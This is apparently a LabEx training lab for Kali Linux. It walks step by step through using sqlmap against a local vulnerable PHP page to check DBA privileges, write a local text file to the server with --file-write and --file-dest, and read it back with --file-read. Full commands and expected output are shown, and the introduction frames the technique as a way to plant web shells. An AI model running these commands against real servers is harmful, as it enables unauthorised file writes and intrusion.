LabEx
Log InJoin Free

Write a Local File to the Server with sqlmap

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will explore a powerful feature of sqlmap: the ability to write local files to a remote server. This capability is crucial in penetration testing scenarios, allowing you to upload web shells, configuration files, or other malicious payloads to a compromised server. We will cover the necessary prerequisites, such as confirming DBA privileges and identifying writable directories, and then walk through the process of creating a file locally, using sqlmap to upload it, and finally verifying its presence on the server.

Confirm DBA Privileges and Directory Write Permissions

In this step, you will use sqlmap to check if the current database user has DBA (Database Administrator) privileges and identify directories on the server that are writable. Having DBA privileges is often a prerequisite for writing files, and knowing writable directories is essential for choosing a destination for your uploaded file.

First, let's check for DBA privileges. This is crucial because sqlmap often requires high privileges to perform file system operations.

sqlmap -u "http://localhost/vulnerable/index.php?id=1" --is-dba

You should see output indicating whether the user is a DBA. Look for a line similar to [INFO] the back-end DBMS user is a DBA.

Next, we need to find a writable directory on the server. sqlmap can help with this by trying to identify common writable paths. We will use the --file-write option with a dummy file and a common writable directory like /tmp to test. While we are not actually writing a file yet, this command can help confirm write capabilities.

sqlmap -u "http://localhost/vulnerable/index.php?id=1" --file-write=/dev/null --file-dest=/tmp/test_write.txt --batch

The --batch flag tells sqlmap to use default answers for questions, which is useful for automation. If the command executes without errors related to permissions, it suggests /tmp is writable.

Expected output for --is-dba:

...
[INFO] checking if the back-end DBMS user is a DBA
[INFO] the back-end DBMS user is a DBA
...

Expected output for testing write permissions (may vary, but look for success messages or lack of permission errors):

...
[INFO] the file '/tmp/test_write.txt' has been successfully written on the back-end DBMS file system
...

Create a Local File to Upload (e.g., upload.txt)

In this step, you will create a simple text file on your local machine (the LabEx environment) that you intend to upload to the target server. This file can contain any content, but for this lab, we'll create a basic text file to demonstrate the process.

Navigate to your home directory's project folder, which is the default working directory in this lab environment.

cd ~/project

Now, create a file named upload.txt with some content using the echo command and redirection.

echo "This file was uploaded from the LabEx environment!" > upload.txt

You can verify the content of the file using cat:

cat upload.txt

Expected output:

This file was uploaded from the LabEx environment!

Use --file-write and --file-dest to Specify Source and Destination

In this step, you will learn about the sqlmap options used for file writing: --file-write and --file-dest.

  • --file-write: This option specifies the local path of the file you want to upload. sqlmap will read the content of this file.
  • --file-dest: This option specifies the absolute path on the remote server where sqlmap should write the file. It's crucial to provide a path to a directory that the database user has write permissions to. Based on our previous step, /tmp/ is a good candidate.

We will prepare the sqlmap command using these options, but we won't execute it until the next step. This allows you to understand the command structure first.

The command will look like this:

sqlmap -u "http://localhost/vulnerable/index.php?id=1" --file-write="/home/labex/project/upload.txt" --file-dest="/tmp/uploaded_file.txt" --batch

Let's break down the command:

  • -u "http://localhost/vulnerable/index.php?id=1": The target URL with the SQL injection vulnerability.
  • --file-write="/home/labex/project/upload.txt": The full path to the local file you created in the previous step. Remember that ~/project expands to /home/labex/project.
  • --file-dest="/tmp/uploaded_file.txt": The full path where the file will be written on the remote server. We are using /tmp/ as the destination directory and naming the uploaded file uploaded_file.txt.
  • --batch: To automate the process and accept default choices.

Take a moment to review the command and ensure the paths are correct.

Execute the Command to Upload the File to a Writable Directory

In this step, you will execute the sqlmap command prepared in the previous step to upload upload.txt from your local machine to the /tmp/ directory on the target server, naming it uploaded_file.txt.

Execute the sqlmap command:

sqlmap -u "http://localhost/vulnerable/index.php?id=1" --file-write="/home/labex/project/upload.txt" --file-dest="/tmp/uploaded_file.txt" --batch

sqlmap will now attempt to write the file. You should observe sqlmap's progress as it tries different techniques to upload the file. If successful, sqlmap will report that the file has been written.

Expected output (look for the success message):

...
[INFO] the file '/tmp/uploaded_file.txt' has been successfully written on the back-end DBMS file system
...

This message confirms that sqlmap believes it has successfully written the file to the specified destination on the server.

Verify the Successful Upload using the --file-read Command

In this final step, you will verify that the file was indeed uploaded to the server and that its content is correct. You can do this by using sqlmap's --file-read option, which allows you to read files from the remote server.

Use the --file-read option, specifying the path to the file you just uploaded on the server:

sqlmap -u "http://localhost/vulnerable/index.php?id=1" --file-read="/tmp/uploaded_file.txt" --batch

sqlmap will attempt to read the file and display its content in the terminal.

Expected output:

...
[INFO] retrieved file content:
This file was uploaded from the LabEx environment!
...

If you see the content "This file was uploaded from the LabEx environment!", it means your file was successfully uploaded and can be read from the server. This confirms the entire process of writing a local file to the server using sqlmap.

Summary

In this lab, you successfully learned how to leverage sqlmap's file writing capabilities. You started by confirming DBA privileges and identifying writable directories on the target server. Then, you created a local file and used sqlmap with the --file-write and --file-dest options to upload it to the server. Finally, you verified the successful upload by reading the file's content from the server using the --file-read option. This skill is fundamental in penetration testing for various post-exploitation activities.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux